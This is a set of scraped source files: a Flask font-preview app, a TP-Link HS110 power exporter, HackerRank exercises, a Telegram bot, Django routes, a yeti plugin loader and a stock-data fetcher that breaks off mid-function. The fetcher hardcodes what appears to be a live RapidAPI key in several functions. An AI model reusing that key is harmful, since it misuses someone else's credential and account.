255)\n\nDATA_DIR = 'data'\n\nCHARMAP_URL = 'https://raw.githubusercontent.com/telefang/telefang/patch/charmap.asm'\nFONTS = {\n 'normal': {\n 'metrics': 'https://raw.githubusercontent.com/telefang/telefang/patch/components/mainscript/font.tffont.csv',\n 'image': 'https://raw.githubusercontent.com/telefang/telefang/patch/gfx/font.png'\n },\n 'bold': {\n 'metrics': 'https://raw.githubusercontent.com/telefang/telefang/patch/components/mainscript/font_bold.tffont.csv',\n 'image': 'https://raw.githubusercontent.com/telefang/telefang/patch/gfx/bold_font.png'\n },\n 'narrow': {\n 'metrics': 'https://raw.githubusercontent.com/telefang/telefang/patch/components/mainscript/font_narrow.tffont.csv',\n 'image': 'https://raw.githubusercontent.com/telefang/telefang/patch/gfx/narrow_font.png'\n }\n}\n\nCONTROL_CODES = {\n '<bold>': {'font': 'bold'},\n '<normal>': {'font': 'normal'}\n}\n\nREPLACE_CODES = {\n '<&name>': \"Shigeki\"\n}\nREPLACE_CODE_RE = re.compile('|'.join(REPLACE_CODES.keys()))\n\napp = Flask(__name__)\n\n@app.before_first_request\ndef setup():\n try:\n load()\n except IOError:\n update()\n\nclass ArgumentError(Exception):\n def __init__(self, message, *args, **kwargs):\n super(ArgumentError, self).__init__(message, *args, **kwargs)\n self.message = message\n\ndef get_query_arg(name,\n transformer=lambda x: x,\n validator=lambda x: True,\n default=None, required=False, 
accept_empty=False):\n try:\n arg = request.args[name]\n if not accept_empty and not arg:\n raise KeyError(name)\n except KeyError:\n if required:\n raise ArgumentError(\"Missing required argument: {}\".format(name))\n else:\n return default\n try:\n arg = transformer(arg)\n assert validator(arg)\n except (ValueError, AssertionError):\n raise ArgumentError(\"Argument invalid: {}\".format(name))\n return arg\n\ndef bounds(lowest, highest):\n def is_within_bounds(n):\n return lowest <= n <= highest\n return is_within_bounds\n\ndef one_of(*values):\n def is_among_values(x):\n return x in values\n return is_among_values\n\n@app.route('/preview')\ndef preview():\n try:\n text = get_query_arg('text', required=True, accept_empty=True)\n width = get_query_arg('width', int, bounds(1, 1024), required=True)\n font = get_query_arg('font', str, one_of('normal', 'bold'), default='normal')\n scale = get_query_arg('scale', int, bounds(1, 8), default=2)\n padding = get_query_arg('padding', int, bounds(0, 128), default=0)\n spacing = get_query_arg('spacing', int, bounds(0, 16), default=0)\n page_lines = get_query_arg('lines-per-page', int, bounds(1, 256), default=None)\n prompt_page_lines = get_query_arg('lines-per-prompt', int, bounds(1, 256), default=None)\n min_lines = get_query_arg('minimum-lines', int, bounds(0, 256), default=0)\n except ArgumentError as e:\n return Response(e.message, 400)\n\n image = preview_image(text, width, font, scale, padding,\n spacing, page_lines, prompt_page_lines,\n min_lines)\n png_data = BytesIO()\n image.save(png_data, format='PNG')\n\n return Response(png_data.getvalue(), mimetype='image/png')\n\ndef preview_image(text, width, font='normal',\n scale=1, padding=0,\n spacing=0, page_lines=None, prompt_page_lines=None,\n min_lines=0):\n # No text formatting, since the JavaScript part takes care of that.\n num_lines = text.count('\\n') + 1\n if prompt_page_lines is not None and prompt_page_lines > min_lines:\n min_lines = prompt_page_lines\n if min_lines and num_lines < min_lines:\n text += '\\n' * (min_lines - num_lines)\n num_lines += min_lines - num_lines\n page_lines = num_lines if page_lines is None else page_lines\n \n num_pages = ceil(num_lines / page_lines)\n page_height = 2 * padding + page_lines * 8 + (page_lines - 1) * spacing * 8\n page_spacing = 8\n image = Image.new(\n 'RGBA',\n (\n padding * 2 + width,\n num_pages * (page_height + page_spacing) - page_spacing\n ),\n BACKGROUND_COLOR\n )\n\n text = REPLACE_CODE_RE.sub(lambda m: REPLACE_CODES[m.group()], text)\n\n font_name = font\n font = app.fonts[font_name]\n text_len = len(text)\n i = 0\n line_num = 0\n x = padding\n y = padding\n while i < text_len:\n for char_len in app.descending_char_lengths:\n char = text[i:i + char_len]\n\n try:\n code_effects = CONTROL_CODES[char]\n except LookupError:\n pass\n else:\n font_name = code_effects.get('font', font_name)\n font = app.fonts[font_name]\n i += char_len\n continue\n \n try:\n code = app.charmap[char]\n except LookupError:\n continue\n else:\n break\n else:\n raise ValueError(\"Character not in charset.\")\n \n if char == '\\n':\n x = padding\n y += 8\n line_num += 1\n if prompt_page_lines and line_num % prompt_page_lines == 0:\n image.alpha_composite(app.prompt_continue,\n (image.width - padding - 8, y - 8))\n if line_num % page_lines == 0:\n y += padding\n image.paste((0, 0, 0, 0), (0, y, image.width, y + 8))\n y += 8 + padding\n else:\n y += 8 * spacing\n else:\n glyph_width = font['metrics'][code]\n glyph = font['glyphs'][code]\n if x + 8 > padding + 
width:\n glyph = glyph.crop((0, 0, max(padding + width - x, 0), 8))\n image.alpha_composite(glyph, (x, y))\n x += glyph_width + 1\n\n i += char_len\n\n if prompt_page_lines:\n image.alpha_composite(\n app.prompt_end,\n (image.width - padding - 8, image.height - padding - 8)\n )\n\n if scale != 1:\n image = image.resize((image.width * scale, image.height * scale))\n\n return image\n\n@app.route('/update', methods=('POST',))\ndef update():\n \"\"\"Update font data from online and save to disk.\"\"\"\n # Split up into three steps to minimize the risk of files being\n # desynced in relation to each other if any part errors out.\n # Prompt tiles aren't updated dynamically at the moment - they're\n # unlikely to change, and it'd just be a pain.\n\n # Fetch resources.\n r = requests.get(CHARMAP_URL)\n raw_charmap = r.text\n\n raw_metric_csvs = []\n for font_name, font_info in FONTS.items():\n r = requests.get(font_info['metrics'])\n filename = 'font_{}.ttfont.csv'.format(font_name)\n raw_metric_csvs.append((filename, r.text))\n\n raw_images = []\n for font_name, font_info in FONTS.items():\n r = requests.get(font_info['image'])\n filename = 'font_{}.png'.format(font_name)\n raw_images.append((filename, r.content))\n \n # Store resources.\n with open(os.path.join(DATA_DIR, 'charmap.asm'), 'w', encoding='utf-8') as f:\n f.write(raw_charmap)\n\n for font_name, csv, image in zip(FONTS.keys(), raw_metric_csvs, raw_images):\n with open(os.path.join(DATA_DIR, csv[0]), 'w', encoding='utf-8') as f:\n f.write(csv[1])\n with open(os.path.join(DATA_DIR, image[0]), 'wb') as f:\n f.write(image[1])\n\n # Put resources into use.\n app.charmap = parse_charmap(raw_charmap)\n app.descending_char_lengths = descending_char_lengths_of(app.charmap, CONTROL_CODES)\n app.fonts = {}\n for font_name, csv, image in zip(FONTS.keys(), raw_metric_csvs, raw_images):\n app.fonts[font_name] = {\n 'metrics': parse_metric_csv(csv[1]),\n 'glyphs': load_glyphs(BytesIO(image[1]))\n }\n \n return Response()\n\ndef load():\n \"\"\"Load font data from disk.\"\"\"\n with open(os.path.join(DATA_DIR, 'charmap.asm'), 'r', encoding='utf-8') as f:\n app.charmap = parse_charmap(f.read())\n app.descending_char_lengths = descending_char_lengths_of(app.charmap, CONTROL_CODES)\n \n app.fonts = {}\n for font_name in FONTS.keys():\n with open(os.path.join(DATA_DIR, 'font_{}.ttfont.csv'.format(font_name)), 'r', encoding='utf-8') as f:\n metrics = parse_metric_csv(f.read())\n with open(os.path.join(DATA_DIR, 'font_{}.png'.format(font_name)), 'rb') as f:\n glyphs = load_glyphs(f)\n app.fonts[font_name] = {\n 'metrics': metrics,\n 'glyphs': glyphs\n }\n \n with open(os.path.join(DATA_DIR, 'prompt_continue.png'), 'rb') as f:\n app.prompt_continue = load_glyphs(f)[0]\n with open(os.path.join(DATA_DIR, 'prompt_end.png'), 'rb') as f:\n app.prompt_end = load_glyphs(f)[0]\n\n# The \"\"\" charmap is actually incorrect RGBDS code, but exists\n# in Telefang's charmap file since it goes through a Python\n# script and never actually through RGBDS.\nCHARMAP_RE = re.compile(r'^(?:charmap \"(?P<char>\"|[^\"]+)\",\\s*(?P<prefix>|\\$|%|&)(?P<code>[0-9A-Fa-f]+))?\\s*(?:;.*)?$')\ndef parse_charmap(s):\n \"\"\"Parse charmap assembly and return a dictionary\n of {character: code} pairs.\n \"\"\"\n charmap = {}\n for line in s.splitlines():\n m = CHARMAP_RE.match(line)\n if not m.group('char'):\n continue\n char = m.group('char')\n if char == '\\\\n':\n char = '\\n'\n code = int(m.group('code'), {'': 10, '$': 16, '%': 2, '&': 8}[m.group('prefix')])\n charmap[char] = code\n 
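# Example for illustration: a line such as charmap \"A\", $41 maps 'A' to code 0x41 (the prefix selects the number base).\n    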
return charmap\n\ndef descending_char_lengths_of(*charsets):\n    \"\"\"Return a list of the different character lengths\n    (e.g. \"x\" has a length of 1; \"<code>\" is 6) in descending order.\n    \"\"\"\n    lengths = set()\n    for charset in charsets:\n        for char in charset:\n            lengths.add(len(char))\n    return sorted(lengths, reverse=True)\n\ndef parse_metric_csv(s):\n    \"\"\"Return a list of glyph widths found in the metric CSV data in `s`.\"\"\"\n    reader = csv.reader(s.splitlines())\n    rows = [row for row in reader]\n    rows = rows[1:] # Strip header row.\n    rows = [row[1:] for row in rows] # Strip header column.\n    widths = [width for row in rows for width in row]\n    widths = [int(width[1:], 16) for width in widths]\n    return widths\n\ndef load_glyphs(f):\n    \"\"\"Return a list of 8×8 glyph images, found in the image file `f`.\"\"\"\n    image = Image.open(f)\n    image = image.convert('RGBA')  # convert() returns a new image; keep the result\n    data = list(image.getdata())\n    for i, (r, g, b, a) in enumerate(data):\n        if (r, g, b) == (255, 255, 255):\n            data[i] = (r, g, b, 0)\n    image.putdata(data)\n\n    glyphs = []\n    for y in range(0, image.height, 8):\n        for x in range(0, image.width, 8):\n            glyphs.append(image.crop((x, y, x + 8, y + 8)))\n\n    return glyphs\n\nif __name__ == '__main__':\n    app.run('localhost', debug=True)\n","repo_name":"telefang/telefang","sub_path":"rip_scripts/sheets/web_preview/preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"}
{"seq_id":"4016466212","text":"#!/usr/bin/env python\n\nfrom prometheus_client import start_http_server, Gauge\nimport time\nimport socket\nimport argparse\nimport json\n\nversion = 0.58\n\n# Check if IP is valid\ndef validIP(ip):\n    try:\n        socket.inet_pton(socket.AF_INET, ip)\n    except socket.error:\n        parser.error(\"Invalid IP Address.\")\n    return ip\n\n# Encryption and Decryption of TP-Link Smart Home Protocol\n# XOR Autokey Cipher with starting key = 171\ndef encrypt(string):\n    key = 171\n    result = \"\\0\\0\\0\\0\"\n    for i in string:\n        a = key ^ ord(i)\n        key = a\n        result += chr(a)\n    return result\n\ndef decrypt(string):\n    key = 171\n    result = \"\"\n    for i in string:\n        a = key ^ ord(i)\n        key = ord(i)\n        result += chr(a)\n    return result\n\n# Parse commandline arguments\n#parser = argparse.ArgumentParser(description=\"TP-Link Wi-Fi Smart Plug Prometheus exporter v\" + str(version))\n#parser.add_argument(\"-t\", \"--target\", metavar=\"<ip>\", required=True, help=\"Target IP Address\", type=validIP)\n#parser.add_argument(\"-f\", \"--frequency\", metavar=\"<seconds>\", required=False, help=\"Interval in seconds between checking measures\", default=1, type=int)\n#parser.add_argument(\"-p\", \"--port\", metavar=\"<port>\", required=False, help=\"Port for listening\", default=8110, type=int)\n#args = parser.parse_args()\n\n# Set target IP, port and command to send\nip = \"192.168.1.150\"\nlisten_port = 8110\nsleep_time = 4\nport = 9999\ncmd = '{\"emeter\":{\"get_realtime\":{}}}'\nreceived_data = {\"emeter\":{\"get_realtime\":{\"current\":0.0,\"voltage\":0.0,\"power\":0.0,\"total\":0.0,\"err_code\":0}}}\n\n# Send command and receive reply\n\n# Create a metric to track time spent and requests made.\n# Gauge: it goes up and down, snapshot of state\n\nREQUEST_POWER = Gauge('hs110_power_watt', 'HS110 Watt measure')\nREQUEST_CURRENT = Gauge('hs110_current', 'HS110 Current measure')\nREQUEST_VOLTAGE = Gauge('hs110_voltage', 'HS110 Voltage measure')\n\n\nREQUEST_POWER.set_function(lambda: get_power() 
)\nREQUEST_CURRENT.set_function(lambda: get_current() )\nREQUEST_VOLTAGE.set_function(lambda: get_voltage() )\n\ndef get_power():\n \"\"\" Get HS110 power \"\"\"\n try:\n return received_data[\"emeter\"][\"get_realtime\"][\"power\"]\n except socket.error:\n quit(\"Could not connect to host \" + ip + \":\" + str(port))\n return 0\n\ndef get_current():\n \"\"\" Get HS110 current \"\"\"\n try:\n return received_data[\"emeter\"][\"get_realtime\"][\"current\"]\n except socket.error:\n quit(\"Could not connect to host \" + ip + \":\" + str(port))\n return 0\n\ndef get_voltage():\n \"\"\" Get HS110 voltage \"\"\"\n try:\n return received_data[\"emeter\"][\"get_realtime\"][\"voltage\"]\n except socket.error:\n quit(\"Could not connect to host \" + ip + \":\" + str(port))\n return 0\n\n# Main entry point\nif __name__ == '__main__':\n # Start up the server to expose the metrics.\n start_http_server(listen_port)\n a=0\n b=0\n c=0\n\n # Main loop\n while True:\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock_tcp.settimeout(2)\n\n try:\n sock_tcp.connect((ip, port))\n sock_tcp.send(encrypt(cmd))\n data = sock_tcp.recv(2048)\n sock_tcp.close()\n #Sample return value received:\n #{\"emeter\":{\"get_realtime\":{\"current\":1.543330,\"voltage\":235.627293,\"power\":348.994080,\"total\":9.737000,\"err_code\":0}}}\n received_data = json.loads(decrypt(data[4:]))\n #print \"IP: \" + ip + \":\" + str(port) + \" Received power: \" + str(received_data[\"emeter\"][\"get_realtime\"][\"power\"])\n except socket.error:\n #print \"Could not connect to the host \"+ ip + \":\" + str(port)\n a = b + c\n except ValueError:\n received_data = {\"emeter\":{\"get_realtime\":{\"current\":0.0,\"voltage\":0.0,\"power\":0.0,\"total\":0.0,\"err_code\":0}}}\n #print \"Could not decrypt data from hs110.\"\n\n time.sleep(sleep_time)\n\n","repo_name":"KyubiKurama/GadgetSpot","sub_path":"tplink.py","file_name":"tplink.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4633740680","text":"import math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\n#1\r\nif __name__ == '__main__':\r\n print(\"Hello World !\")\r\n\r\n#2\r\nif __name__ == '__main__':\r\n n = int(raw_input().strip())\r\nif n%2 != 0 :\r\n print(\"Weird\")\r\nif n>=2 and n<=5 :\r\n if n%2 == 0 :\r\n print(\"Not Weird\")\r\n \r\nif n>=6 and n<=20 :\r\n if n%2 == 0 :\r\n print(\"Weird\")\r\nif n>20 :\r\n if n%2 == 0 :\r\n print(\"Not Weird\")\r\n\r\n \r\n#3\r\nif __name__ == '__main__':\r\n a = int(raw_input())\r\n b = int(raw_input())\r\ns = a +b\r\nm = a - b\r\np = a*b \r\nprint(s)\r\nprint(m)\r\nprint(p)\r\n\r\n#4\r\nif __name__ == '__main__':\r\n a = int(raw_input())\r\n b = int(raw_input())\r\n\r\ns = a//b\r\nd =a/b\r\nprint(s)\r\nprint(d)\r\n\r\n#5\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\nfor i in range(0,n) :\r\n a = i*i\r\n print(a)\r\n\r\n#6\r\ndef is_leap(year):\r\n leap = False\r\n \r\n if year%4 == 0 and year%100 != 0 :\r\n leap = True\r\n return leap\r\n elif year%400 == 0 :\r\n leap = True\r\n return leap\r\n elif year%100 == 0 :\r\n leap = False\r\n return leap \r\n else :\r\n return False\r\n\r\n#7\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\n\r\nfor i in range(1,n+1) :\r\n print(i,end=\"\")\r\n\r\n\r\n#8\r\nif __name__ == '__main__' :\r\n x, y, z, n = int(input()), int(input()), int(input()), int(input())\r\n print 
([[a,b,c] for a in range(0,x+1) for b in range(0,y+1) for c in range(0,z+1) if a + b + c != n ])\r\n \r\n#9\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\n lis = list(map(int,raw_input().split()))\r\n print(sorted(list(set(lis)))[-2])\r\n \r\n#10\r\nif __name__ == '__main__' :\r\n grade = []\r\n for _ in range((int(input()))) :\r\n name = raw_input()\r\n score = float(input())\r\n grade.append([name,score])\r\n sort = sorted(list(set([x[1] for x in grade])))\r\n second = sort[1]\r\n final_list = []\r\n for student in grade :\r\n if second == student[1] :\r\n final_list.append(student[0])\r\n for student in sorted(final_list) :\r\n print(student)\r\n \r\n#11\r\nif __name__ == '__main__':\r\n n = int(raw_input())\r\n student_marks = {}\r\n for _ in range(n):\r\n line = raw_input().split()\r\n name, scores = line[0], line[1:]\r\n scores = map(float, scores)\r\n student_marks[name] = scores\r\n query_name = raw_input()\r\n query_scores = student_marks[query_name]\r\nprint(\"{0:.2f}\".format(sum(query_scores)/(len(query_scores))))\r\n","repo_name":"Rayson-LD/HackerRank-Python-Programs","sub_path":"hackerrank.py","file_name":"hackerrank.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19074986857","text":"#!/usr/bin/env python3\nimport time\nfrom telegram import Update\nfrom os import getenv\nfrom dotenv import load_dotenv, dotenv_values\nfrom telegram.ext import ApplicationBuilder, CommandHandler, ContextTypes, CallbackContext\nfrom wherearethemonkeys.wherearethemonkeys import Locator\nimport sqlite3\n\n\nconn = sqlite3.connect('wherearethemonkeys.db')\n\ncur = conn.cursor()\n\ncur.execute(\"\"\"CREATE TABLE IF NOT EXISTS users(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n chat_id INTEGER UNIQUE\n )\"\"\")\n\n\ncur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS friends(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n owner_id INTEGER NOT NULL,\n login TEXT NOT NULL\n )\n \"\"\")\nconn.commit()\n#cur.execute(\"INSERT INTO users(chat_id) VALUES(?)\", (int(121)))\n\n\n\n\n\n\n\n\n\ndef give_format(list: dict) -> str:\n location = \"Here are your friends:\\n\"\n for user in list:\n if list[user]:\n location += f\"\"\"• {user} -> {list[user]}\\n\"\"\"\n return location\n\nclass Location:\n def __init__(self):\n self.cursor = conn.cursor()\n self.logins = {}\n self.locator = Locator()\n\nclass DataTimer:\n def __init__(self):\n self.timer = 35 * 60\n self.time_init = time.monotonic()\n self.dead = None\n self.alert = None\n\nclass Bot:\n def __init__(self):\n self.location = Location()\n self.log_out_time = 42 * 60\n self.timer = {}\n self.messages = dotenv_values(\"messages_templates.txt\")\n\n\n\n async def help_panel(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n await update.effective_message.reply_text(self.messages[\"HELP_PANEL\"])\n\n\n def list(self, chat_id):\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n users = \"\"\n if id and id[0]:\n self.location.cursor.execute(\"SELECT login FROM friends WHERE owner_id=?\", (id[0],))\n userslist = self.location.cursor.fetchall()\n for user in userslist:\n users += user[0] + ','\n return users\n\n async def list_show(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n list = self.list(chat_id).split(',')\n userlist = \"\"\n for element in list[:-1]:\n userlist += \"• \" + element + 
'\\n'\n if userlist == \"\":\n await update.effective_message.reply_text(\"ERROR No friends list\")\n return\n await update.effective_message.reply_text(f\"\"\"Your friends list:\\n{userlist}\"\"\")\n\n\n async def wherearethemonkeys(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n users = self.list(chat_id)\n if not users:\n await update.effective_message.reply_text(\"ERROR No friends list\")\n return\n self.location.locator.set_payload(users_input=users)\n locations = self.location.locator.dict_list()\n await update.effective_message.reply_text(give_format(locations))\n\n\n async def add_monkey(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n if not id or not id[0]:\n self.location.cursor.execute(\"INSERT INTO users(chat_id) VALUES(?)\", (chat_id,))\n conn.commit()\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n if context.args:\n for userlogin in context.args:\n self.location.cursor.executemany(\"INSERT INTO friends(login, owner_id) VALUES(?, ?)\", [(userlogin, id[0])])\n conn.commit()\n await update.effective_message.reply_text(\"Users added correctly\")\n return\n await update.effective_message.reply_text(\"ERROR Something went wrong\")\n\n async def delete_monkey(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n if not context.args:\n await update.effective_message.reply_text(\"ERROR You need to provide a valid login\")\n return\n\n self.location.cursor.execute(\"SELECT id FROM users WHERE chat_id=?\", (chat_id,))\n id = self.location.cursor.fetchone()\n if not id or not id[0]:\n await update.effective_message.reply_text(\"ERROR You don't have a friends list\")\n for user in context.args:\n self.location.cursor.execute(\"SELECT login FROM friends WHERE owner_id=? AND login=?\", (id[0], user))\n rmuser = self.location.cursor.fetchone()\n if not rmuser:\n await update.effective_message.reply_text(\"ERROR You need to provide a valid login\")\n return\n self.location.cursor.executemany(\"DELETE FROM friends WHERE owner_id=? AND login=?\", [(id[0], user,)])\n conn.commit()\n await update.effective_message.reply_text(\"User deleted correctly\")\n\n\n async def alarm(self, context: ContextTypes.DEFAULT_TYPE) -> None:\n job = context.job\n log_out_minutes = self.log_out_time - (job.data / 60)\n self.timer[job.chat_id].alert = None\n await context.bot.send_message(job.chat_id, text=f\"Ey! 
You have {log_out_minutes} minutes untill I die\\nGive me bananas please\")\n\n\n async def timeout(self, context: ContextTypes.DEFAULT_TYPE) -> None:\n job = context.job\n self.timer[job.chat_id].dead = None\n await context.bot.send_message(job.chat_id, text=f\"Your monkey has died, be carefull next time\\n#monkeylifematters\")\n\n\n async def start(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n if not chat_id:\n return\n if chat_id in self.timer:\n await self.stop(update, context)\n self.timer[chat_id] = DataTimer()\n if context.args and context.args[0].isnumeric() and float(context.args[0]) > 0:\n self.timer[chat_id].timer = float(context.args[0])\n first_name = update.effective_user.first_name\n self.timer[chat_id].time_init = time.monotonic()\n timer_clock = self.timer[chat_id].time_init - self.timer[chat_id].time_init\n self.timer[chat_id].dead = context.job_queue.run_once(self.timeout, self.log_out_time, chat_id=chat_id, name=str(chat_id))\n self.timer[chat_id].alert = context.job_queue.run_once(self.alarm, self.timer[chat_id].timer, chat_id=chat_id, name=str(chat_id), data=self.timer[chat_id].timer)\n await update.message.reply_text(f'Hello {first_name}, you\\'ve started the script.\\nTimer: {timer_clock}')\n\n\n async def status(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n\n if not chat_id in self.timer:\n await update.message.reply_text('ERROR you dont have a monkey, please execute /start')\n elif self.timer[chat_id].time_init != 0:\n timer = time.monotonic() - self.timer[chat_id].time_init\n await update.message.reply_text(f'Timer: {timer}')\n\n async def stop(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n chat_id = update.effective_message.chat_id\n #if self.timer[chat_id].alert and self.timer[chat_id].dead:\n try:\n if self.timer[chat_id].alert:\n self.timer[chat_id].alert.schedule_removal()\n if self.timer[chat_id].dead:\n self.timer[chat_id].dead.schedule_removal()\n self.timer.pop(chat_id)\n except (IndexError, AttributeError, KeyError):\n await update.effective_message.reply_text(\"ERROR\\nSorry, you have nothing to stop\")\n\n async def stop_all(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n self.timer = {}\n await context.job_queue.stop()\n\n\n\n\n\n\n\nload_dotenv()\n\nbot = Bot()\nkey = getenv(\"BOT_TOKEN\")\n\n\napp = ApplicationBuilder().token(key).build()\n\n#\n#---------- HELP PANEL HANDLER ------------------\n#\napp.add_handler(CommandHandler([\"h\", \"help\"], bot.help_panel))\n#\n#---------- LOGIN HANDLERS ----------------------\n#\napp.add_handler(CommandHandler([\"start\", \"s\"], bot.start))\napp.add_handler(CommandHandler([\"timerstatus\", \"ts\"], bot.status))\napp.add_handler(CommandHandler([\"stop\", \"o\"], bot.stop))\napp.add_handler(CommandHandler(\"kill\", bot.stop_all))\n\n\n\n#\n#---------- WHERE ARE THE MONKEYS HANDLERS ------\n#\napp.add_handler(CommandHandler([\"addmonkey\", \"a\"], bot.add_monkey))\napp.add_handler(CommandHandler([\"deletemonkey\", \"d\"], bot.delete_monkey))\napp.add_handler(CommandHandler([\"wherearethemonkeys\", \"w\"], bot.wherearethemonkeys))\napp.add_handler(CommandHandler([\"list\", \"ls\"], 
bot.list_show))\n#app.add_error_handler()\n\napp.run_polling()\n\nconn.close()\n","repo_name":"iortego42/monkey-telegram-bot","sub_path":"monkeyneedsbanana.py","file_name":"monkeyneedsbanana.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42344309823","text":"import pkgutil\nimport inspect\nimport importlib\n\nfrom core.scheduling import ScheduleEntry, OneShotEntry\nfrom core.analytics import InlineAnalytics\nfrom core.constants import PLUGINS_ROOT\n\nPLUGIN_CLASSES = (ScheduleEntry, OneShotEntry, InlineAnalytics)\n\n\ndef get_plugin_classes():\n classes = []\n\n for _, name, ispkg in pkgutil.walk_packages([PLUGINS_ROOT], prefix=\"plugins.\"):\n if not ispkg:\n module = importlib.import_module(name)\n for _, obj in inspect.getmembers(module, inspect.isclass):\n if issubclass(obj, PLUGIN_CLASSES) and obj.default_values is not None:\n classes.append(obj)\n\n return classes\n\n\ndef get_plugins():\n entries = {}\n\n for obj in get_plugin_classes():\n entry = obj.get_or_create(name=obj.default_values[\"name\"])\n if entry.new:\n entry.modify(**obj.default_values)\n\n for sched in ScheduleEntry.objects.all():\n entries[sched.name] = sched\n\n return entries\n","repo_name":"yeti-platform/yeti","sub_path":"core/yeti_plugins.py","file_name":"yeti_plugins.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1485,"dataset":"github-code","pt":"21"} +{"seq_id":"12408962329","text":"from django.urls import path\nfrom .views import (TagsList, ProductDetail, LimitedList, \n PopularList, SalesList, CreateReview)\n\nurlpatterns = [\n path('api/product/<int:pk>/', ProductDetail.as_view(), name='product_detail'),\n path('api/product/<int:pk>/reviews/', CreateReview.as_view()),\n path('api/tags/', TagsList.as_view(), name='tags_list'),\n path('api/products/popular/', PopularList.as_view(), name='popular'),\n path('api/products/limited/', LimitedList.as_view(), name='limited'),\n path('api/sales/', SalesList.as_view(), name='sales'),\n]","repo_name":"GlebSmor/Django_Shop","sub_path":"megano/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"17582036682","text":"import requests\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport json\nimport datetime\nimport plotly.offline as pyo\nimport plotly.graph_objects as go\nimport os\n\n\ndef GetCrypto():\n url = \"https://twelve-data1.p.rapidapi.com/cryptocurrencies\"\n querystring = {\"format\":\"json\"}\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n L = []\n try:\n cryptos = json.loads(response.text)[\"data\"]\n except:\n raise Exception(\"Requests/min Exceeded.\")\n\n for crypto in cryptos:\n L.append(crypto[\"symbol\"])\n return L\n\ndef GetStocks():\n url = \"https://twelve-data1.p.rapidapi.com/stocks\"\n\n querystring = {\"exchange\": 'NASDAQ', \"format\":\"json\"}\n\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n try:\n data = json.loads(response.text)[\"data\"]\n 
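# Note: a bare except hides the real failure here; when the per-minute quota is exceeded the response has no \"data\" key, and the resulting KeyError is what gets reported as \"Requests/min Exceeded.\"\n    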
except:\n raise Exception(\"Requests/min Exceeded.\")\n \n L = []\n for e in data:\n L.append(e[\"symbol\"])\n \n return list(dict.fromkeys(L)) # Removing Duplicates\n\ndef GetForex():\n url = \"https://twelve-data1.p.rapidapi.com/forex_pairs\"\n querystring = {\"format\":\"json\"}\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n L = []\n try:\n forex = json.loads(response.text)[\"data\"]\n except:\n raise Exception(\"Requests/min Exceeded.\")\n \n for stock in forex:\n L.append(stock[\"symbol\"])\n return list(dict.fromkeys(L)) # Removing Duplicates\n\n\ndef GetStockData(symbol, interval, size=2*365):\n url = \"https://twelve-data1.p.rapidapi.com/time_series\"\n\n querystring = {\"interval\":interval, \"symbol\":symbol, \"format\":\"json\", \"outputsize\":size}\n\n headers = {\n \"X-RapidAPI-Key\": \"01859bbbdbmsh5ef4be697540182p16dee3jsnd363a79130f7\",\n \"X-RapidAPI-Host\": \"twelve-data1.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n\n H, L, O, C, V, D = [], [], [], [], [], []\n try:\n data = json.loads(response.text)[\"values\"]\n except:\n raise Exception(\"GETSTOCKDATA: Not Found / Cooldown !\")\n\n \n # Setting Data\n for e in data:\n H.append(e[\"high\"])\n D.append(e[\"datetime\"])\n L.append(e[\"low\"])\n O.append(e[\"open\"])\n C.append(e[\"close\"])\n try:\n V.append(e[\"volume\"])\n except:\n 